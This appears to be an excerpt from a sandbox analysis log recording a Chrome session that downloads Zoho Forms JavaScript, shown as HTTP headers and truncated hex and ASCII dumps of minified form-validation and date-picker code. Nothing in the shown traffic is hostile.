                                                                                                                                                                                              2024-11-20 20:28:27 UTC3333INData Raw: 76 61 72 20 5a 46 43 6f 6e 73 74 61 6e 74 73 3d 7b 53 41 56 45 5f 52 45 43 4f 52 44 5f 53 54 41 54 55 53 3a 31 7d 2c 5a 46 48 74 74 70 3d 7b 47 45 54 3a 22 47 45 54 22 2c 50 4f 53 54 3a 22 50 4f 53 54 22 2c 44 45 4c 45 54 45 3a 22 44 45 4c 45 54 45 22 2c 50 55 54 3a 22 50 55 54 22 7d 2c 5a 46 4d 69 6d 65 54 79 70 65 3d 7b 41 50 50 4c 49 43 41 54 49 4f 4e 5f 4a 53 4f 4e 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 2c 5a 46 46 6f 72 6d 46 69 65 6c 64 3d 7b 41 44 44 52 45 53 53 3a 7b 4d 41 50 5f 49 4e 46 4f 3a 22 5f 4d 61 70 5f 49 6e 66 6f 22 2c 43 4f 55 4e 54 52 59 3a 7b 4b 45 59 3a 22 5f 43 6f 75 6e 74 72 79 22 7d 2c 53 54 41 54 45 3a 7b 4b 45 59 3a 22 5f 52 65 67 69 6f 6e 22 7d 2c 43 49 54 59 3a 7b 4b 45 59 3a 22 5f 43 69 74 79 22 7d 2c 41
                                                                                                                                                                                              Data Ascii: var ZFConstants={SAVE_RECORD_STATUS:1},ZFHttp={GET:"GET",POST:"POST",DELETE:"DELETE",PUT:"PUT"},ZFMimeType={APPLICATION_JSON:"application/json"},ZFFormField={ADDRESS:{MAP_INFO:"_Map_Info",COUNTRY:{KEY:"_Country"},STATE:{KEY:"_Region"},CITY:{KEY:"_City"},A
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 3a 22 54 4f 4d 4f 52 52 4f 57 5f 4c 45 53 53 54 48 41 4e 22 2c 54 4f 4d 4f 52 52 4f 57 5f 4c 45 53 53 45 51 55 41 4c 3a 22 54 4f 4d 4f 52 52 4f 57 5f 4c 45 53 53 45 51 55 41 4c 22 2c 54 4f 4d 4f 52 52 4f 57 5f 47 52 45 41 54 45 52 54 48 41 4e 3a 22 54 4f 4d 4f 52 52 4f 57 5f 47 52 45 41 54 45 52 54 48 41 4e 22 2c 54 4f 4d 4f 52 52 4f 57 5f 47 52 45 41 54 45 52 45 51 55 41 4c 3a 22 54 4f 4d 4f 52 52 4f 57 5f 47 52 45 41 54 45 52 45 51 55 41 4c 22 2c 54 4f 4d 4f 52 52 4f 57 5f 42 45 54 57 45 45 4e 3a 22 54 4f 4d 4f 52 52 4f 57 5f 42 45 54 57 45 45 4e 22 2c 54 4f 4d 4f 52 52 4f 57 5f 49 53 54 49 4d 45 3a 22 54 4f 4d 4f 52 52 4f 57 5f 49 53 54 49 4d 45 22 2c 54 4f 4d 4f 52 52 4f 57 5f 49 53 4e 4f 54 54 49 4d 45 3a 22 54 4f 4d 4f 52 52 4f 57 5f 49 53 4e 4f 54
                                                                                                                                                                                              Data Ascii: :"TOMORROW_LESSTHAN",TOMORROW_LESSEQUAL:"TOMORROW_LESSEQUAL",TOMORROW_GREATERTHAN:"TOMORROW_GREATERTHAN",TOMORROW_GREATEREQUAL:"TOMORROW_GREATEREQUAL",TOMORROW_BETWEEN:"TOMORROW_BETWEEN",TOMORROW_ISTIME:"TOMORROW_ISTIME",TOMORROW_ISNOTTIME:"TOMORROW_ISNOT
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 75 64 65 5f 63 75 72 72 65 6e 74 6d 6f 6e 74 68 22 2c 4d 41 58 5f 4c 45 4e 3a 22 6d 61 78 5f 6c 65 6e 22 2c 4d 49 4e 5f 55 50 4c 4f 41 44 5f 4c 49 4d 49 54 3a 22 6d 69 6e 5f 75 70 6c 6f 61 64 5f 6c 69 6d 69 74 22 2c 50 41 54 54 45 52 4e 3a 7b 50 41 54 54 45 52 4e 5f 56 41 4c 3a 22 70 61 74 74 65 72 6e 5f 76 61 6c 22 2c 52 45 47 45 58 5f 50 41 54 54 45 52 4e 5f 56 41 4c 3a 22 72 65 67 65 78 5f 70 61 74 74 65 72 6e 5f 76 61 6c 22 2c 4b 45 59 3a 22 70 61 74 74 65 72 6e 22 2c 50 41 54 54 45 52 4e 5f 54 59 50 45 3a 22 70 61 74 74 65 72 6e 5f 74 79 70 65 22 7d 7d 2c 44 61 74 65 54 69 6d 65 53 70 65 63 43 6f 6e 73 74 3d 7b 54 49 4d 45 5f 53 4c 4f 54 53 3a 22 74 69 6d 65 5f 73 6c 6f 74 73 22 2c 41 4c 4c 4f 57 5f 50 41 53 54 5f 54 49 4d 45 5f 4f 4e 4c 59 3a 22 61
                                                                                                                                                                                              Data Ascii: ude_currentmonth",MAX_LEN:"max_len",MIN_UPLOAD_LIMIT:"min_upload_limit",PATTERN:{PATTERN_VAL:"pattern_val",REGEX_PATTERN_VAL:"regex_pattern_val",KEY:"pattern",PATTERN_TYPE:"pattern_type"}},DateTimeSpecConst={TIME_SLOTS:"time_slots",ALLOW_PAST_TIME_ONLY:"a
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 67 65 78 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 28 28 28 5c 5c 64 2b 29 7c 28 28 5c 5c 64 7b 31 2c 33 7d 28 22 2b 74 68 6f 75 73 61 6e 64 73 65 70 61 72 61 74 6f 72 2b 22 5c 5c 64 7b 33 7d 29 2a 29 29 29 28 22 2b 64 65 63 69 6d 61 6c 73 65 70 61 72 61 74 6f 72 2b 22 5c 5c 64 7b 31 2c 22 2b 64 65 63 69 6d 61 6c 4c 65 6e 67 74 68 2b 22 7d 29 3f 29 7c 28 22 2b 64 65 63 69 6d 61 6c 73 65 70 61 72 61 74 6f 72 2b 22 5c 5c 64 7b 31 2c 22 2b 64 65 63 69 6d 61 6c 4c 65 6e 67 74 68 2b 22 7d 29 29 24 22 2c 22 67 22 29 29 3b 72 65 74 75 72 6e 20 72 65 67 65 78 2e 74 65 73 74 28 69 6e 70 29 7d 2c 74 68 69 73 2e 63 68 6b 4d 61 78 4c 69 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 75 6d 2c 6d 61 78 4c 69 6d 69 74 29 7b 72 65 74 75 72 6e 20 6e 75 6d 3c 3d 6d 61 78 4c
                                                                                                                                                                                              Data Ascii: gex=new RegExp("^((((\\d+)|((\\d{1,3}("+thousandseparator+"\\d{3})*)))("+decimalseparator+"\\d{1,"+decimalLength+"})?)|("+decimalseparator+"\\d{1,"+decimalLength+"}))$","g"));return regex.test(inp)},this.chkMaxLimit=function(num,maxLimit){return num<=maxL
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 65 76 61 6c 2e 6c 65 6e 67 74 68 29 7d 72 65 74 75 72 6e 22 30 31 2d 22 2b 64 61 74 65 65 6c 65 6d 65 6e 74 73 5b 30 5d 2b 22 2d 22 2b 64 61 74 65 65 6c 65 6d 65 6e 74 73 5b 31 5d 7d 72 65 74 75 72 6e 20 64 61 74 65 76 61 6c 7d 2c 74 68 69 73 2e 63 6f 6e 76 65 72 74 54 6f 47 65 6e 65 72 61 6c 44 61 74 65 54 69 6d 65 5f 64 64 4d 4d 4d 79 79 79 79 68 68 6d 6d 3d 66 75 6e 63 74 69 6f 6e 28 76 61 6c 75 65 2c 74 69 6d 65 46 6f 72 6d 61 74 2c 64 61 74 65 4c 6f 63 61 6c 65 29 7b 69 66 28 74 79 70 65 6f 66 20 76 61 6c 75 65 21 3d 52 65 73 70 6f 6e 73 65 4b 65 79 2e 55 4e 44 45 46 49 4e 45 44 26 26 22 22 21 3d 76 61 6c 75 65 29 7b 76 61 72 20 73 70 6c 69 74 49 6e 64 65 78 3d 76 61 6c 75 65 2e 69 6e 64 65 78 4f 66 28 22 20 22 29 2c 64 61 74 65 3d 76 61 6c 75 65 2e
                                                                                                                                                                                              Data Ascii: eval.length)}return"01-"+dateelements[0]+"-"+dateelements[1]}return dateval},this.convertToGeneralDateTime_ddMMMyyyyhhmm=function(value,timeFormat,dateLocale){if(typeof value!=ResponseKey.UNDEFINED&&""!=value){var splitIndex=value.indexOf(" "),date=value.
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 6f 72 4e 6f 7d 2c 74 68 69 73 2e 67 65 74 44 65 63 69 6d 61 6c 56 61 6c 69 64 43 68 61 72 3d 66 75 6e 63 74 69 6f 6e 28 66 6f 72 6d 61 74 29 7b 76 61 72 20 76 61 6c 69 64 43 68 61 72 73 3d 22 31 32 33 34 35 36 37 38 39 30 2e 22 3b 72 65 74 75 72 6e 20 32 3d 3d 66 6f 72 6d 61 74 7c 7c 33 3d 3d 66 6f 72 6d 61 74 3f 76 61 6c 69 64 43 68 61 72 73 3d 22 31 32 33 34 35 36 37 38 39 30 2e 2c 22 3a 34 3d 3d 66 6f 72 6d 61 74 26 26 28 76 61 6c 69 64 43 68 61 72 73 3d 22 31 32 33 34 35 36 37 38 39 30 20 2c 22 29 2c 76 61 6c 69 64 43 68 61 72 73 7d 2c 74 68 69 73 2e 67 65 74 52 61 69 6c 77 61 79 54 69 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 74 69 6d 65 56 61 6c 29 7b 76 61 72 20 68 6f 75 72 73 3d 4e 75 6d 62 65 72 28 74 69 6d 65 56 61 6c 2e 6d 61 74 63 68 28 2f 5e 28 5c
                                                                                                                                                                                              Data Ascii: orNo},this.getDecimalValidChar=function(format){var validChars="1234567890.";return 2==format||3==format?validChars="1234567890.,":4==format&&(validChars="1234567890 ,"),validChars},this.getRailwayTime=function(timeVal){var hours=Number(timeVal.match(/^(\
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 7b 76 61 72 20 64 61 74 65 73 65 70 2c 6d 6f 6e 74 68 2c 64 61 74 65 65 6c 65 6d 65 6e 74 73 3d 6e 65 77 20 41 72 72 61 79 28 33 29 3b 64 61 74 65 76 61 6c 2e 69 6e 64 65 78 4f 66 28 22 2d 22 29 3e 3d 30 3f 64 61 74 65 73 65 70 3d 22 2d 22 3a 64 61 74 65 76 61 6c 2e 69 6e 64 65 78 4f 66 28 22 2f 22 29 3e 3d 30 3f 64 61 74 65 73 65 70 3d 22 2f 22 3a 64 61 74 65 76 61 6c 2e 69 6e 64 65 78 4f 66 28 22 2e 22 29 3e 3d 30 26 26 28 64 61 74 65 73 65 70 3d 22 2e 22 29 3b 76 61 72 20 64 61 74 65 66 6f 72 6d 61 74 4c 6f 77 65 72 63 61 73 65 3d 64 61 74 65 66 6f 72 6d 61 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 69 66 28 74 79 70 65 6f 66 20 64 61 74 65 4c 6f 63 61 6c 65 21 3d 52 65 73 70 6f 6e 73 65 4b 65 79 2e 55 4e 44 45 46 49 4e 45 44 26 26 22 22 21 3d 64
                                                                                                                                                                                              Data Ascii: {var datesep,month,dateelements=new Array(3);dateval.indexOf("-")>=0?datesep="-":dateval.indexOf("/")>=0?datesep="/":dateval.indexOf(".")>=0&&(datesep=".");var dateformatLowercase=dateformat.toLowerCase();if(typeof dateLocale!=ResponseKey.UNDEFINED&&""!=d
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 65 29 3b 72 65 74 75 72 6e 21 69 73 4e 61 4e 28 64 31 5b 30 5d 29 26 26 21 69 73 4e 61 4e 28 64 31 5b 31 5d 29 26 26 28 6d 6d 3d 64 31 5b 30 5d 2b 31 2c 79 79 79 79 3d 64 31 5b 31 5d 2c 21 28 6d 6d 3c 31 7c 7c 6d 6d 3e 31 32 7c 7c 79 79 79 79 3c 31 7c 7c 79 79 79 79 3c 31 65 33 7c 7c 79 79 79 79 3e 39 39 39 39 29 29 7d 2c 74 68 69 73 2e 73 65 74 44 61 74 65 54 69 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 64 61 74 65 46 6f 72 6d 61 74 2c 64 61 74 65 4c 6f 63 61 6c 65 2c 74 69 6d 65 46 6f 72 6d 61 74 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 64 61 74 65 50 69 63 6b 65 72 49 6e 70 75 74 29 7b 76 61 72 20 73 65 6c 44 61 74 65 2c 73 65 6c 44 61 74 65 54 69 6d 65 3d 24 28 64 61 74 65 50 69 63 6b 65 72 49 6e 70 75 74 29 2e 76 61 6c 28 29 3b 69 66 28 30 21 3d 3d 24 2e 74 72
                                                                                                                                                                                              Data Ascii: e);return!isNaN(d1[0])&&!isNaN(d1[1])&&(mm=d1[0]+1,yyyy=d1[1],!(mm<1||mm>12||yyyy<1||yyyy<1e3||yyyy>9999))},this.setDateTime=function(dateFormat,dateLocale,timeFormat){if(null!==datePickerInput){var selDate,selDateTime=$(datePickerInput).val();if(0!==$.tr
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 65 74 75 72 6e 21 30 7d 2c 74 68 69 73 2e 76 61 6c 69 64 61 74 65 45 6d 61 69 6c 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 6d 61 69 6c 56 61 6c 75 65 29 7b 76 61 72 20 63 68 65 63 6b 3d 30 3b 69 66 28 6e 75 6c 6c 21 3d 65 6d 61 69 6c 56 61 6c 75 65 26 26 22 22 3d 3d 21 65 6d 61 69 6c 56 61 6c 75 65 29 7b 76 61 72 20 65 6d 61 69 6c 41 72 72 61 79 3d 65 6d 61 69 6c 56 61 6c 75 65 2e 73 70 6c 69 74 28 22 2c 22 29 3b 66 6f 72 28 69 3d 30 3b 69 3c 65 6d 61 69 6c 41 72 72 61 79 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 67 65 74 45 6d 61 69 6c 52 65 67 65 78 28 29 2e 74 65 73 74 28 24 2e 74 72 69 6d 28 65 6d 61 69 6c 41 72 72 61 79 5b 69 5d 29 29 7c 7c 28 63 68 65 63 6b 3d 31 29 7d 72 65 74 75 72 6e 20 30 3d 3d 63 68 65 63 6b 7d 72 65 74 75 72 6e 21 30 7d 2c 74 68 69
                                                                                                                                                                                              Data Ascii: eturn!0},this.validateEmailID=function(emailValue){var check=0;if(null!=emailValue&&""==!emailValue){var emailArray=emailValue.split(",");for(i=0;i<emailArray.length;i++){getEmailRegex().test($.trim(emailArray[i]))||(check=1)}return 0==check}return!0},thi
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 74 65 46 6f 72 6d 61 74 2c 65 6c 65 6d 2c 64 61 74 65 4c 6f 63 61 6c 65 2c 74 69 6d 65 46 6f 72 6d 61 74 29 2c 6e 65 65 64 53 68 6f 77 29 7b 76 61 72 20 6f 72 69 67 48 65 69 67 68 74 3d 24 28 65 6c 65 6d 29 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 3b 24 28 65 6c 65 6d 29 2e 6f 75 74 65 72 48 65 69 67 68 74 28 4d 61 74 68 2e 63 65 69 6c 28 6f 72 69 67 48 65 69 67 68 74 29 29 2c 24 28 65 6c 65 6d 29 2e 64 61 74 65 70 69 63 6b 65 72 28 29 2e 64 61 74 65 70 69 63 6b 65 72 28 22 73 68 6f 77 22 29 2c 24 28 22 23 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 64 69 76 22 29 2e 73 68 6f 77 28 29 7d 63 72 65 61 74 65 41 6e 64 4c 6f 61 64 54 69 6d 65 50 69 63 6b 65 72 28 63 6c 69 65 6e 74 44 61 74 65 46 6f 72 6d 61 74 2c 65 6c 65 6d 2c 64 61 74 65 4c 6f 63 61 6c 65 2c
                                                                                                                                                                                              Data Ascii: teFormat,elem,dateLocale,timeFormat),needShow){var origHeight=$(elem).outerHeight();$(elem).outerHeight(Math.ceil(origHeight)),$(elem).datepicker().datepicker("show"),$("#ui-datepicker-div").show()}createAndLoadTimePicker(clientDateFormat,elem,dateLocale,


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              84192.168.2.549812199.67.80.864431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:26 UTC576OUTGET /forms/js/formslive.a18412a662b0ec06aad976efc699e409.js HTTP/1.1
                                                                                                                                                                                              Host: static.zohocdn.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://forms.zohopublic.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:27 UTC763INHTTP/1.1 200
                                                                                                                                                                                              Server: ZGS
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:27 GMT
                                                                                                                                                                                              Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                              Content-Length: 981720
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                              ETag: "7ccfbd1ce6c6e3eee5cd08b4e96e9ebc"
                                                                                                                                                                                              Content-Language: en-US
                                                                                                                                                                                              Last-Modified: Tue, 05 Nov 2024 10:39:46 GMT
                                                                                                                                                                                              Access-Control-Expose-Headers: *
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              strict-transport-security: max-age=15768000
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              x-cache: HIT
                                                                                                                                                                                              nb-request-id: b0c7ba21f300b9ad3621ffe0dd76d152
                                                                                                                                                                                              z-origin-id: sa1-d6b1e6d18f26406ea1792da930106c1a
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Strict-Transport-Security: max-age=64072000; includeSubDomains; preload
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:27 UTC3333INData Raw: 2f 2f 20 24 49 64 3a 20 24 0a 2f 2a 2a 0a 20 2a 20 49 4d 50 4f 52 54 41 4e 54 20 4e 4f 54 45 3a 20 54 68 69 73 20 63 6f 6d 70 72 65 73 73 65 64 20 6a 73 20 66 69 6c 65 20 69 6e 63 6c 75 64 65 73 20 5a 6f 68 6f 20 46 6f 72 6d 73 20 46 6f 72 6d 73 2f 52 65 70 6f 72 74 20 6c 69 76 65 20 6a 73 2e 0a 20 2a 2f 0a 66 75 6e 63 74 69 6f 6e 20 5a 46 4c 69 76 65 46 6f 72 6d 46 6f 63 75 73 48 61 6e 64 65 72 4f 6e 4e 61 76 69 67 61 74 69 6f 6e 28 61 63 74 69 6f 6e 54 79 70 65 2c 70 61 67 65 4e 6f 29 7b 74 68 69 73 2e 61 63 74 69 6f 6e 54 79 70 65 3d 61 63 74 69 6f 6e 54 79 70 65 2c 74 68 69 73 2e 70 61 67 65 4e 6f 3d 70 61 67 65 4e 6f 7d 66 75 6e 63 74 69 6f 6e 20 5a 46 4c 69 76 65 46 69 65 6c 64 46 6f 63 75 73 48 61 6e 64 65 72 28 66 69 65 6c 64 45 6c 65 6d 2c 66 6f
                                                                                                                                                                                              Data Ascii: // $Id: $/** * IMPORTANT NOTE: This compressed js file includes Zoho Forms Forms/Report live js. */function ZFLiveFormFocusHanderOnNavigation(actionType,pageNo){this.actionType=actionType,this.pageNo=pageNo}function ZFLiveFieldFocusHander(fieldElem,fo
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 4f 70 74 69 6f 6e 73 2e 50 41 47 45 29 73 65 74 46 6f 63 75 73 46 6f 72 45 6c 65 6d 65 6e 74 54 68 61 74 43 61 6e 6e 6f 74 42 65 46 6f 63 75 73 65 64 28 24 28 22 64 69 76 5b 65 6c 6e 61 6d 65 3d 66 6f 72 6d 42 6f 64 79 55 4c 4e 61 6d 65 5d 5b 70 61 67 65 5f 6e 6f 3d 27 22 2b 74 68 69 73 2e 70 61 67 65 4e 6f 2b 22 27 5d 22 29 2e 66 69 6e 64 28 22 64 69 76 5b 65 6c 6e 61 6d 65 3d 66 6f 72 6d 50 61 67 65 48 65 61 64 65 72 5d 3a 66 69 72 73 74 22 29 2e 66 69 6e 64 28 22 68 32 22 29 29 3b 65 6c 73 65 7b 76 61 72 20 66 69 72 73 74 4c 69 3d 24 28 22 64 69 76 5b 65 6c 6e 61 6d 65 3d 66 6f 72 6d 42 6f 64 79 55 4c 4e 61 6d 65 5d 5b 70 61 67 65 5f 6e 6f 3d 27 22 2b 74 68 69 73 2e 70 61 67 65 4e 6f 2b 22 27 5d 22 29 2e 66 69 6e 64 28 22 64 69 76 5b 65 6c 6e 61 6d 65
                                                                                                                                                                                              Data Ascii: Options.PAGE)setFocusForElementThatCannotBeFocused($("div[elname=formBodyULName][page_no='"+this.pageNo+"']").find("div[elname=formPageHeader]:first").find("h2"));else{var firstLi=$("div[elname=formBodyULName][page_no='"+this.pageNo+"']").find("div[elname
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 63 75 73 46 6f 72 4d 61 74 72 69 78 43 68 6f 69 63 65 57 69 74 68 6f 75 74 53 70 65 63 69 61 6c 48 61 6e 64 6c 69 6e 67 28 29 7d 2c 5a 46 4c 69 76 65 46 69 65 6c 64 46 6f 63 75 73 48 61 6e 64 65 72 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 46 6f 63 75 73 46 6f 72 4d 61 74 72 69 78 43 68 6f 69 63 65 57 69 74 68 6f 75 74 53 70 65 63 69 61 6c 48 61 6e 64 6c 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 24 28 74 68 69 73 2e 66 69 65 6c 64 45 6c 65 6d 29 2e 61 74 74 72 28 22 63 68 6f 69 63 65 74 79 70 65 22 29 21 3d 4d 61 74 72 69 78 43 68 6f 69 63 65 73 54 79 70 65 2e 44 52 4f 50 44 4f 57 4e 2e 43 4f 44 45 3f 74 68 69 73 2e 73 65 74 46 6f 63 75 73 46 6f 72 4d 61 74 72 69 78 54 65 78 74 62 6f 78 46 6c 64 28 29 3a 74 68 69 73 2e 73 65 74 46 6f 63 75 73 46 6f 72
                                                                                                                                                                                              Data Ascii: cusForMatrixChoiceWithoutSpecialHandling()},ZFLiveFieldFocusHander.prototype.setFocusForMatrixChoiceWithoutSpecialHandling=function(){$(this.fieldElem).attr("choicetype")!=MatrixChoicesType.DROPDOWN.CODE?this.setFocusForMatrixTextboxFld():this.setFocusFor
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 63 6f 6d 70 74 79 70 65 3d 3d 3d 5a 46 46 69 65 6c 64 54 79 70 65 43 6f 6e 73 74 61 6e 74 73 2e 45 4d 41 49 4c 7c 7c 63 6f 6d 70 74 79 70 65 3d 3d 3d 5a 46 46 69 65 6c 64 54 79 70 65 43 6f 6e 73 74 61 6e 74 73 2e 4e 55 4d 42 45 52 3f 24 28 74 68 69 73 2e 66 69 65 6c 64 45 6c 65 6d 29 2e 66 69 6e 64 28 22 73 70 61 6e 5b 65 6c 6e 61 6d 65 3d 6c 69 76 65 66 69 65 6c 64 2d 72 65 63 6f 6e 66 2d 65 6c 65 6d 5d 22 29 2e 66 69 6e 64 28 22 69 6e 70 75 74 22 29 2e 66 6f 63 75 73 28 29 3a 24 28 74 68 69 73 2e 66 69 65 6c 64 45 6c 65 6d 29 2e 66 69 6e 64 28 22 64 69 76 5b 65 6c 6e 61 6d 65 3d 63 6f 6e 66 50 68 6f 6e 65 46 6c 64 5d 22 29 2e 66 69 6e 64 28 22 69 6e 70 75 74 3a 66 69 72 73 74 22 29 2e 66 6f 63 75 73 28 29 29 7d
                                                                                                                                                                                              Data Ascii: );return void(comptype===ZFFieldTypeConstants.EMAIL||comptype===ZFFieldTypeConstants.NUMBER?$(this.fieldElem).find("span[elname=livefield-reconf-elem]").find("input").focus():$(this.fieldElem).find("div[elname=confPhoneFld]").find("input:first").focus())}
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 70 65 2e 69 73 55 70 6c 6f 61 64 46 69 65 6c 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 6f 6d 70 74 79 70 65 3d 24 28 74 68 69 73 2e 66 69 65 6c 64 45 6c 65 6d 29 2e 61 74 74 72 28 22 63 6f 6d 70 74 79 70 65 22 29 2c 63 6f 6d 70 54 79 70 65 49 6e 74 3d 70 61 72 73 65 49 6e 74 28 63 6f 6d 70 74 79 70 65 29 2c 75 70 6c 6f 61 64 46 69 65 6c 64 73 3d 5b 5d 3b 72 65 74 75 72 6e 20 75 70 6c 6f 61 64 46 69 65 6c 64 73 2e 70 75 73 68 28 5a 46 46 69 65 6c 64 54 79 70 65 43 6f 6e 73 74 61 6e 74 73 2e 46 49 4c 45 5f 55 50 4c 4f 41 44 29 2c 75 70 6c 6f 61 64 46 69 65 6c 64 73 2e 70 75 73 68 28 5a 46 46 69 65 6c 64 54 79 70 65 43 6f 6e 73 74 61 6e 74 73 2e 49 4d 41 47 45 5f 55 50 4c 4f 41 44 29 2c 75 70 6c 6f 61 64 46 69 65 6c 64 73 2e 70 75 73 68 28 5a
                                                                                                                                                                                              Data Ascii: pe.isUploadFields=function(){var comptype=$(this.fieldElem).attr("comptype"),compTypeInt=parseInt(comptype),uploadFields=[];return uploadFields.push(ZFFieldTypeConstants.FILE_UPLOAD),uploadFields.push(ZFFieldTypeConstants.IMAGE_UPLOAD),uploadFields.push(Z
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 72 72 6f 72 3a 69 31 38 6e 2e 63 68 65 63 6b 66 69 65 6c 64 2c 66 69 6c 65 75 70 6c 6f 61 64 6d 61 6e 64 61 74 6f 72 79 65 72 72 6f 72 3a 69 31 38 6e 2e 63 68 6f 6f 73 65 66 69 6c 65 2c 66 69 6c 65 75 70 6c 6f 61 64 6c 69 6d 69 74 65 72 72 6f 72 3a 69 31 38 6e 2e 66 69 6c 65 73 63 6f 75 6e 74 65 78 63 65 65 64 2c 75 70 6c 6f 61 64 73 69 7a 65 3a 69 31 38 6e 2e 75 70 6c 6f 61 64 73 69 7a 65 2c 73 69 67 6e 61 74 75 72 65 6d 61 6e 64 61 74 6f 72 79 65 72 72 6f 72 3a 69 31 38 6e 2e 69 6e 63 6f 6d 70 6c 65 74 65 73 69 67 6e 61 74 75 72 65 2c 6d 61 74 72 69 78 63 68 6f 69 63 65 6d 61 6e 64 61 74 6f 72 79 65 72 72 6f 72 3a 69 31 38 6e 2e 6d 61 74 72 69 78 63 68 6f 69 63 65 6d 61 6e 64 61 74 6f 72 79 2c 63 68 65 63 6b 74 63 66 69 65 6c 64 3a 69 31 38 6e 2e 63 68
                                                                                                                                                                                              Data Ascii: rror:i18n.checkfield,fileuploadmandatoryerror:i18n.choosefile,fileuploadlimiterror:i18n.filescountexceed,uploadsize:i18n.uploadsize,signaturemandatoryerror:i18n.incompletesignature,matrixchoicemandatoryerror:i18n.matrixchoicemandatory,checktcfield:i18n.ch
                                                                                                                                                                                              2024-11-20 20:28:27 UTC4096INData Raw: 69 54 6f 42 65 46 6f 63 75 73 73 65 64 29 2e 61 74 74 72 28 22 76 69 65 77 74 79 70 65 22 29 29 7b 76 61 72 20 73 66 55 6c 73 3d 69 73 53 74 61 6e 64 61 72 64 46 6f 72 6d 28 29 3f 24 28 6c 69 54 6f 42 65 46 6f 63 75 73 73 65 64 29 2e 66 69 6e 64 28 22 64 69 76 5b 65 6c 6e 61 6d 65 3d 73 75 62 46 6f 72 6d 46 69 65 6c 64 73 55 6c 5d 22 29 3a 24 28 6c 69 54 6f 42 65 46 6f 63 75 73 73 65 64 29 2e 66 69 6e 64 28 27 5b 65 6c 6e 61 6d 65 3d 22 73 75 62 46 6f 72 6d 46 69 65 6c 64 73 55 6c 22 5d 27 29 3b 73 66 55 6c 73 2e 6c 65 6e 67 74 68 3e 30 26 26 28 6c 69 54 6f 42 65 46 6f 63 75 73 73 65 64 3d 69 73 53 74 61 6e 64 61 72 64 46 6f 72 6d 28 29 3f 24 28 73 66 55 6c 73 29 2e 66 69 6e 64 28 22 64 69 76 5b 65 6c 6e 61 6d 65 3d 6c 69 76 65 66 69 65 6c 64 2d 65 6c 65
                                                                                                                                                                                              Data Ascii: iToBeFocussed).attr("viewtype")){var sfUls=isStandardForm()?$(liToBeFocussed).find("div[elname=subFormFieldsUl]"):$(liToBeFocussed).find('[elname="subFormFieldsUl"]');sfUls.length>0&&(liToBeFocussed=isStandardForm()?$(sfUls).find("div[elname=livefield-ele
